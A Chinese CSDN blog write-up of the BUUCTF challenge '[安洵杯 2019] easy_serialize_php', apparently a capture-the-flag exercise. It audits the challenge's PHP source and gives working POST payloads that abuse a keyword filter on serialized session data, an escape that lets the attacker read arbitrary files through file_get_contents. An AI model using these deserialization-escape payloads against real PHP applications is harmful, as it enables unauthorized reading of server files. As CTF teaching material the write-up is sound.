BUUCTF Web [安洵杯 2019]easy_serialize_php1

已于 2023-05-30 11:23:41 修改
阅读量482 收藏
点赞数
分类专栏: BUUCTF Web 文章标签: 安全
于 2022-10-12 11:34:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/127278213
版权

[安洵杯 2019]easy_serialize_php1

启动靶机,点击source_code

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

代码审计

01531524de5546a3a7d224eb3b265e32.png

可以看到注释中提示我们查看phpinfo信息,构造payload:

/index.php?f=phpinfo

 ctrl+f输入flag,但没发现什么有用信息,再查找.php文件,发现了可疑文件

0dc7cf8e129f4ec6ad66edd727273ce5.png

 感觉flag应该就放在d0g3_f1ag.php中,直接访问发现是空白页,

回去继续代码审计

1ff3b4578188438b843a7e1a14d0b04d.png

使用了黑名单,把php,flag,php5,php4,fl1g替换成空格 

7777d6054cd44b8eb2769893738fc4fb.png

对$_SESSION进行序列化处理,并对其function进行判断,并输出对应页面或函数。满足highlight_file,可以看到index.php源码。满足phpinfo可以看到phpinfo信息。满足第三个条件可以输出可控的文件内容。所以思路就是通过show_image获取flag。

现在我们就要base64_decode($userinfo[‘img’])=d0g3_f1ag.php。
那么就要$userinfo[‘img’]=ZDBnM19mMWFnLnBocA==。
而$userinfo又是通过$serialize_info反序列化来的。
$serialize_info又是通过session序列化之后再过滤得来的。
然后注意extract($_POST);前面只有两个参数,而img在后面是不可控的
所以我们就根据前两个参数的字符串逃逸来实现第三个元素的增加
然后逃逸会被吞掉一个参数,所以我们要新增一个,让其保持三个参数

然后这里又有两个思路
键名和键值都能过滤都可以实现逃逸

参考了一下大佬的wp

构造payload:

GET:    ?f=show_image
POST:   _SESSION[user]=flagflagflagflagflagflagflag&_SESSION[function]=a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"1";}

61cd367033b64d09948232d0a7db0f6b.png

 得到空页面,右键查看源代码

e623ba8118a447a896077588d8c7c52c.png

对/d0g3_fllllllag进行base64编码

30476acf02b04b16bcd38a71c7b6ea42.png 

 构造最终payload:

GET:    ?f=show_image
POST:   _SESSION[user]=flagflagflagflagflagflagflag&_SESSION[function]=a:2:{";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"a";s:1:"1";}

9de1cbb36e0f4553a4fe1dbb9b136fe3.png

 拿到flag           flag{a918deba-a9f7-4d0a-a8ba-8ed28e8b26bb}

参考文章

 

WmVicmE=
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
jet_serialize:用于 Javascript 的扩展序列化程序
06-11
**jet_serialize: 用于JavaScript的扩展序列化程序** 在JavaScript编程中,数据的序列化是一个常见的需求,它涉及将对象转换为字符串以便存储或传输。`jet_serialize`库提供了一个强大的解决方案,允许开发者以更...
[安洵 2019]easy_web
qq_57861415的博客
03-27 191
[安洵 2019]easy_web
[安洵 2019]easy_serialize_php1
最新发布
alwtj的博客
06-16 1101
filter 这个function 可以看作一个过滤器,具体内容为首先定义了一个$filter_arr数组,数组的内容为:'php','flag','php5','php4','fl1g',又定义了一个$filter的字符串,格式是为了迎合下面的preg_replease()函数,意思就是如果匹配到$filter_arr数组中的内容则将其转换为空,且由于i的缘故,不区分大小写.s:20:"ZDBnM19mMWFnLnBocA==";s:48:" 就变成了 s:7:"";
[安洵 2019]easy_web1
不会编程的崽的博客
02-02 616
ctf 安洵 easy_web
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
**1. MFC 串行化基础** MFC的串行化机制是通过继承`CObject`类并重载`serialize`函数实现的。`CObject`类提供了基本的串行化支持,允许对象的状态(即其成员变量)被序列化到一个流中,例如文件或网络套接字。`...
se_mouz_image.rar_serialize_序列化
09-23
在这个“se_mouz_image.rar_serialize_序列化”的主题中,我们将深入探讨如何利用`serialize()`函数来序列化文档以及实现鼠标画图功能。 首先,我们来详细解释一下`serialize()`函数。`serialize()`是PHP内建的一个...
ts_serialize:零依赖库,用于序列化数据
05-19
:bowl_with_spoon: ts_serialize 零依赖库,用于序列化数据。 ts_serialize可以帮助您: 将camelCase类成员转换为snake_case JSON属性以与REST API一起使用从REST API有效负载中排除内部字段将数据类型转换为内部...
CTF之easy_web
qq_74263993的博客
03-26 200
尝试了目录遍历以及漏洞扫描但是没有什么卵用,抓了一下包发现是python,所以考虑一下SSTI注入。通过符号列表进行爆破,发现 / 也被过滤了,但是 ︷ 会被解析成 { ,︸ 会被解析成 }打开网站就一个输入框,按理来说这种类型就是注入类型的漏洞了,至于什么注入还不知道。然后就可以进行SSTI注入了。但是好像{{}}被过滤了。下面是可以注入的ssti。
攻防世界-web- easyphp
32bin的博客
10-30 1215
最近在学习CTF web相关知识,顺带学习php,在攻防世界平台上做做题。遇到了一道名为easyphp的题目,对我这个新手一点也不easy,于是决定把过程记录下来。版权声明:本文为CSDN博主「weixin_46906325」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/weixin_46906325/article/details/127154789。#攻防世界-web- easyphp。依次构造a、b、c的值!
buuctf[安洵 2019]easy_serialize_php
2202_75317918的博客
03-30 452
buuctf[安洵 2019]easy_serialize_php
[安洵 2019]easy_serialize_php 1
m0_62879498的博客
05-08 3084
[安洵 2019]easy_serialize_php 1 进入环境,我们首先查看 index.php 源码 代码审计: $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,''
BUUCTF [安洵 2019]easy_serialize_php 1 详细讲解
qq_56313338的博客
08-12 527
题目来自buuctf,这是一题关于php序列化逃逸的题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值